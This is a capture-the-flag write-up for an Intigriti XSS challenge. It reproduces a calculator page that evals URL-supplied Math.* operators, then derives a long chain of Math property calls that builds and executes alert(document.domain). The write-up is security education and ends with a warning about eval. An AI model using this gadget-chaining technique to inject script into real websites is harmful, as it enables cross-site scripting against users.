- Category: Web
- Impact: Medium
- Solves: ~10
Find a way to execute alert(document.domain) on the challenge page.
The solution:
- Should work on the latest version of Chrome and Firefox.
- Should execute
alert(document.domain). - Should leverage a cross site scripting vulnerability on this domain.
- Shouldn't be
self-XSSor related toMiTMattacks. - Should
NOTuse another challenge on theintigriti.iodomain. - Should require
nouser interaction.
For this August, on the challenge page we can see what looks like to be a simple calculator interface:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>Pure Functional Math Calculator</title>
<style>
body {
background-color: #DFDBE5;
background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 304 304' width='304' height='304'%3E%3Cpath fill='%239C92AC' fill-opacity='0.4' d='M44.1 224a5 5 0 1 1 0 2H0v-2h44.1zm160 48a5 5 0 1 1 0 2H82v-2h122.1zm57.8-46a5 5 0 1 1 0-2H304v2h-42.1zm0 16a5 5 0 1 1 0-2H304v2h-42.1zm6.2-114a5 5 0 1 1 0 2h-86.2a5 5 0 1 1 0-2h86.2zm-256-48a5 5 0 1 1 0 2H0v-2h12.1zm185.8 34a5 5 0 1 1 0-2h86.2a5 5 0 1 1 0 2h-86.2zM258 12.1a5 5 0 1 1-2 0V0h2v12.1zm-64 208a5 5 0 1 1-2 0v-54.2a5 5 0 1 1 2 0v54.2zm48-198.2V80h62v2h-64V21.9a5 5 0 1 1 2 0zm16 16V64h46v2h-48V37.9a5 5 0 1 1 2 0zm-128 96V208h16v12.1a5 5 0 1 1-2 0V210h-16v-76.1a5 5 0 1 1 2 0zm-5.9-21.9a5 5 0 1 1 0 2H114v48H85.9a5 5 0 1 1 0-2H112v-48h12.1zm-6.2 130a5 5 0 1 1 0-2H176v-74.1a5 5 0 1 1 2 0V242h-60.1zm-16-64a5 5 0 1 1 0-2H114v48h10.1a5 5 0 1 1 0 2H112v-48h-10.1zM66 284.1a5 5 0 1 1-2 0V274H50v30h-2v-32h18v12.1zM236.1 176a5 5 0 1 1 0 2H226v94h48v32h-2v-30h-48v-98h12.1zm25.8-30a5 5 0 1 1 0-2H274v44.1a5 5 0 1 1-2 0V146h-10.1zm-64 96a5 5 0 1 1 0-2H208v-80h16v-14h-42.1a5 5 0 1 1 0-2H226v18h-16v80h-12.1zm86.2-210a5 5 0 1 1 0 2H272V0h2v32h10.1zM98 101.9V146H53.9a5 5 0 1 1 0-2H96v-42.1a5 5 0 1 1 2 0zM53.9 34a5 5 0 1 1 0-2H80V0h2v34H53.9zm60.1 3.9V66H82v64H69.9a5 5 0 1 1 0-2H80V64h32V37.9a5 5 0 1 1 2 0zM101.9 82a5 5 0 1 1 0-2H128V37.9a5 5 0 1 1 2 0V82h-28.1zm16-64a5 5 0 1 1 0-2H146v44.1a5 5 0 1 1-2 0V18h-26.1zm102.2 270a5 5 0 1 1 0 2H98v14h-2v-16h124.1zM242 149.9V160h16v34h-16v62h48v48h-2v-46h-48v-66h16v-30h-16v-12.1a5 5 0 1 1 2 0zM53.9 18a5 5 0 1 1 0-2H64V2H48V0h18v18H53.9zm112 32a5 5 0 1 1 0-2H192V0h50v2h-48v48h-28.1zm-48-48a5 5 0 0 1-9.8-2h2.07a3 3 0 1 0 5.66 0H178v34h-18V21.9a5 5 0 1 1 2 0V32h14V2h-58.1zm0 96a5 5 0 1 1 0-2H137l32-32h39V21.9a5 5 0 1 1 2 0V66h-40.17l-32 32H117.9zm28.1 90.1a5 5 0 1 1-2 0v-76.51L175.59 80H224V21.9a5 5 0 1 1 2 0V82h-49.59L146 112.41v75.69zm16 32a5 5 0 1 1-2 0v-99.51L184.59 96H300.1a5 5 0 0 1 3.9-3.9v2.07a3 3 0 0 0 0 5.66v2.07a5 5 0 0 1-3.9-3.9H185.41L162 121.41v98.69zm-144-64a5 5 0 1 1-2 0v-3.51l48-48V48h32V0h2v50H66v55.41l-48 48v2.69zM50 53.9v43.51l-48 48V208h26.1a5 5 0 1 1 0 2H0v-65.41l48-48V53.9a5 5 0 1 1 2 0zm-16 16V89.41l-34 34v-2.82l32-32V69.9a5 5 0 1 1 2 0zM12.1 32a5 5 0 1 1 0 2H9.41L0 43.41V40.6L8.59 32h3.51zm265.8 18a5 5 0 1 1 0-2h18.69l7.41-7.41v2.82L297.41 50H277.9zm-16 160a5 5 0 1 1 0-2H288v-71.41l16-16v2.82l-14 14V210h-28.1zm-208 32a5 5 0 1 1 0-2H64v-22.59L40.59 194H21.9a5 5 0 1 1 0-2H41.41L66 216.59V242H53.9zm150.2 14a5 5 0 1 1 0 2H96v-56.6L56.6 162H37.9a5 5 0 1 1 0-2h19.5L98 200.6V256h106.1zm-150.2 2a5 5 0 1 1 0-2H80v-46.59L48.59 178H21.9a5 5 0 1 1 0-2H49.41L82 208.59V258H53.9zM34 39.8v1.61L9.41 66H0v-2h8.59L32 40.59V0h2v39.8zM2 300.1a5 5 0 0 1 3.9 3.9H3.83A3 3 0 0 0 0 302.17V256h18v48h-2v-46H2v42.1zM34 241v63h-2v-62H0v-2h34v1zM17 18H0v-2h16V0h2v18h-1zm273-2h14v2h-16V0h2v16zm-32 273v15h-2v-14h-14v14h-2v-16h18v1zM0 92.1A5.02 5.02 0 0 1 6 97a5 5 0 0 1-6 4.9v-2.07a3 3 0 1 0 0-5.66V92.1zM80 272h2v32h-2v-32zm37.9 32h-2.07a3 3 0 0 0-5.66 0h-2.07a5 5 0 0 1 9.8 0zM5.9 0A5.02 5.02 0 0 1 0 5.9V3.83A3 3 0 0 0 3.83 0H5.9zm294.2 0h2.07A3 3 0 0 0 304 3.83V5.9a5 5 0 0 1-3.9-5.9zm3.9 300.1v2.07a3 3 0 0 0-1.83 1.83h-2.07a5 5 0 0 1 3.9-3.9zM97 100a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-48 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 96a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-144a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM49 36a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM33 68a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 240a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm80-176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm112 176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 180a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 84a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6z'%3E%3C/path%3E%3C/svg%3E");
}
main {
max-width: 750px;
margin: 64px auto;
text-align: center;
background: rgba(255,255,255,0.85);
padding: 8px 16px;
border-radius: 16px;
}
.container {
display: flex;
justify-content: center;
}
.stack-block {
max-height: 500px;
overflow: auto;
box-sizing: border-box;
width: 200px;
min-height: 150px;
border-width: 1px;
border-style: solid;
}
.stack-block div {
padding: 4px;
background: aliceblue;
border-bottom: 1px solid;
word-break: break-word;
}
.wrapper{
width: 400px;
padding: 10px;
border-width: 1px;
border-style: solid;
border-color: #DDDDDD;
margin-right: 12px;
}
.result{
box-sizing: border-box;
width: 400px;
padding: 12px;
min-height: 150px;
border-width: 1px;
border-style: solid;
border-color: #CCCCCC;
text-align: right;
font-family: sans-serif;
font-size: 24px;
color: #3c3c3c;
word-break: break-word;
}
.row{
display: flex;
justify-content: space-between;
}
.row > button{
width: 94px;
height: 36px;
display: inline-block;
margin-top: 6px;
border-width: 1px;
border-style: solid;
border-color: #CCCCCC;
font-size: 16px;
color: #3c3c3c;
}
.row > button:hover{
cursor: pointer;
border-color: #AAAAAA;
}
.btn-fn{
background: #FFFFFF;
}
.btn-equal{
background: #ff8d00;
border-style: none;
}
.btn-equal:hover{
background: #ea8200;
}
</style>
</head>
<body>
<main>
<h1>Pure Functional Math Calculator</h1>
<div class="container">
<div class="wrapper">
<div class="result">Math.random()</div>
<div class="pad">
<div class="row">
<button class="btn-ac">AC</button>
</div>
<div class="row">
<button class="btn-fn">sin</button>
<button class="btn-fn">cos</button>
<button class="btn-fn">tan</button>
<button class="btn-fn">floor</button>
</div>
<div class="row">
<button class="btn-fn">acos</button>
<button class="btn-fn">asin</button>
<button class="btn-fn">atan</button>
<button class="btn-fn">ceil</button>
</div>
<div class="row">
<button class="btn-fn">cosh</button>
<button class="btn-fn">sinh</button>
<button class="btn-fn">tanh</button>
<button class="btn-fn">round</button>
</div>
<div class="row">
<button class="btn-share">share</button>
<button class="btn-equal">=</button>
</div>
</div>
</div>
<div class="stack-block">
<div>1. Math.random</div>
</div>
</div>
</main>
<script>
(function(){
name = 'Pure Functional Math Calculator'
let next;
Math.random = function () {
if (!this.seeds) {
this.seeds = [0.62536, 0.458483, 0.544523, 0.323421, 0.775465]
next = this.seeds[new Date().getTime() % this.seeds.length]
}
next = next * 1103515245 + 12345
return (next / 65536) % 32767
}
console.assert(Math.random() > 0)
const result = document.querySelector('.result')
const stack = document.querySelector('.stack-block')
let operators = []
document.querySelector('.pad').addEventListener('click', handleClick)
let qs = new URLSearchParams(window.location.search)
if (qs.get('q')) {
const ops = qs.get('q').split(',')
if (ops.length >= 100) {
alert('Max length of array is 99, got:' + ops.length)
return init()
}
for(let op of ops) {
if (!op.startsWith('Math.')) {
alert(`Operator should start with Math.: ${op}`)
return init()
}
if (!/^[a-zA-Z0-9.]+$/.test(op)) {
alert(`Invalid operator: ${op}`)
return init()
}
}
for(let op of ops) {
addOperator(op)
}
calculateResult()
} else {
init()
}
function init() {
addOperator('Math.random')
}
function addOperator(name) {
result.innerText = `${name}(${result.innerText})`
operators.push(name)
let div = document.createElement('div')
div.textContent = `${operators.length}. ${name}`
stack.prepend(div)
}
function calculateResult() {
result.innerText = eval(result.innerText)
}
function handleClick(e) {
let className = e.target.className
let text = e.target.innerText
if (className === 'btn-fn') {
addOperator(`Math.${text}`)
} else if (className === 'btn-ac') {
result.innerText = 'Math.random()';
stack.innerHTML = '<div>1. Math.random</div>'
operators = ['Math.random']
} else if (className === 'btn-share'){
alert('Please copy the URL!')
location.search = '?q=' + operators.join(',')
} else if (className === 'btn-equal') {
calculateResult()
}
}
})()
</script>
</body>
</html>We must respect the fact that each (less than 100) operation starts with Math. containing only !/^[a-zA-Z0-9.]+$/ alphanumeric characters.
Note that the Math.seeds array contains 5 floating-point numbers, like the 5 letters of the word alert which could attract our attention!
The eval() function evaluates code represented as a string and returns its completion value, so we soon realize that there's a flaw with the use of eval here:
function calculateResult() {
result.innerText = eval(result.innerText)
}By fiddling with the url parameter q and reading the Math global object documentation, we wonder whether there might be an underlying problem.
The value q=Math.cos returns a NaN (the global property representing Not-A-Number) element.
The value q=Math.E returns the following error:
VM170:1 Uncaught TypeError: Math.E is not a function
at eval (eval at calculateResult (index.html:64:30), <anonymous>:1:6)
at calculateResult (index.html?q=Math.E:211:30)
at index.html?q=Math.E:192:11
at index.html?q=Math.E:231:9Without too much expectation, we understand that we need to chain Math's properties/methods with seeds to create an alert as Math.constructor.constructor.call.call(Math.constructor.constructor('alert(document.domain)')) intended.
There are various codegolf approaches to achieve this but we will focus on what comes to mind when we read some articles:
Expressions Value
* Math.abs.name 'abs'
.constructor.fromCharCode( `(`
Math.round( 40
Math.exp( 40.46509368441047
Math.log2( 3.700439718141092
Math.isPrototypeOf.name 'isPrototypeOf'
.length.valueOf() 13
)
)
)
)
- Math.constructor.constructor.call.call ƒ call() { [native code] }
- Math.constructor.constructor ƒ Function() { [native code] }
- Math.abs.name.at(Math.valueOf()) 'a'
- Math.log.name.at() 'l'
- Math.exp.name.at() 'e'
- Math.round.name.at() 'r'
- Math.tan.name.at() 't'
- Math.abs.name.constructor.fromCharCode(Math.round(Math.exp(Math.log2(Math.isPrototypeOf.name.length.valueOf())))) `(`
- Math.round.name.at(Math.acos.name.length.valueOf()) 'd'
- Math.floor.name.at(Math.E.toFixed()) 'o'
- Math.cos.name.at() 'c'
- Math.fround.name.at(Math.E.toFixed()) 'u'
- Math.max.name.at() 'm'
- Math.exp.name.at() 'e'
- Math.min.name.at(Math.abs.name.at.name.length.valueOf()) 'n'
- Math.tan.name.at() 't'
- Math.abs.name.constructor.fromCharCode(Math.round(Math.log2(Math.expm1(Math.clz32())))) '.'
- Math.round.name.at(Math.acos.name.length.valueOf()) 'd'
- Math.floor.name.at(Math.E.toFixed()) 'o'
- Math.max.name.at() 'm'
- Math.abs.name.at() 'a'
- Math.imul.name.at() 'i'
- Math.min.name.at(Math.abs.name.at.name.length.valueOf()) 'n'
- Math.abs.name.constructor.fromCharCode(Math.ceil(Math.exp(Math.log2(Math.isPrototypeOf.name.length.valueOf())))) `)`Don't forget that expressions must be used with valueOf (method of Object instances that converts the this value to an object) indeed.
Then it gives us a working alert in web console:
>>>
Math.constructor.constructor.call.call(
Math.constructor.constructor(
Math.seeds.join(
Math.seeds.constructor.prototype.join(
Math.seeds.push(
Math.abs.name.constructor.fromCharCode(
Math.ceil(
Math.exp(
Math.log2(
Math.isPrototypeOf.name.length.valueOf(
Math.seeds.push(
Math.min.name.at(
Math.abs.name.at.name.length.valueOf(
Math.seeds.push(
Math.imul.name.at(
Math.valueOf(
Math.seeds.push(
Math.abs.name.at(
Math.valueOf(
Math.seeds.push(
Math.max.name.at(
Math.valueOf(
Math.seeds.push(
Math.floor.name.at(
Math.E.toFixed(
Math.valueOf(
Math.seeds.push(
Math.round.name.at(
Math.acos.name.length.valueOf(
Math.seeds.push(
Math.abs.name.constructor.fromCharCode(
Math.round(
Math.log2(
Math.expm1(
Math.clz32(
Math.valueOf(
Math.seeds.push(
Math.tan.name.at(
Math.valueOf(
Math.seeds.push(
Math.min.name.at(
Math.abs.name.at.name.length.valueOf(
Math.seeds.push(
Math.exp.name.at(
Math.valueOf(
Math.seeds.push(
Math.max.name.at(
Math.valueOf(
Math.seeds.push(
Math.fround.name.at(
Math.E.toFixed(
Math.valueOf(
Math.seeds.push(
Math.cos.name.at(
Math.valueOf(
Math.seeds.push(
Math.floor.name.at(
Math.E.toFixed(
Math.valueOf(
Math.seeds.push(
Math.round.name.at(
Math.acos.name.length.valueOf(
Math.seeds.push(
Math.abs.name.constructor.fromCharCode(
Math.round(
Math.exp(
Math.log2(
Math.isPrototypeOf.name.length.valueOf(
Math.seeds.push(
Math.tan.name.at(
Math.valueOf(
Math.seeds.push(
Math.round.name.at(
Math.valueOf(
Math.seeds.push(
Math.exp.name.at(
Math.valueOf(
Math.seeds.push(
Math.log.name.at(
Math.valueOf(
Math.seeds.push(
Math.abs.name.at(
Math.seeds.pop(
Math.seeds.pop(
Math.seeds.pop(
Math.seeds.pop(
Math.seeds.pop(
Math.seeds.pop)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
<<< Math.constructor.constructor.call.call(Math.constructor.constructor('alert(document.domain)'));All that is left to do is to swap/reverse the lines (with commas instead of the left parenthesis) and remove superfluous brackets as here:
Be careful with eval, especially without some Content Security Policy.
This challenge is not inspired by a real-world bug but was a quite fun puzzle to start with!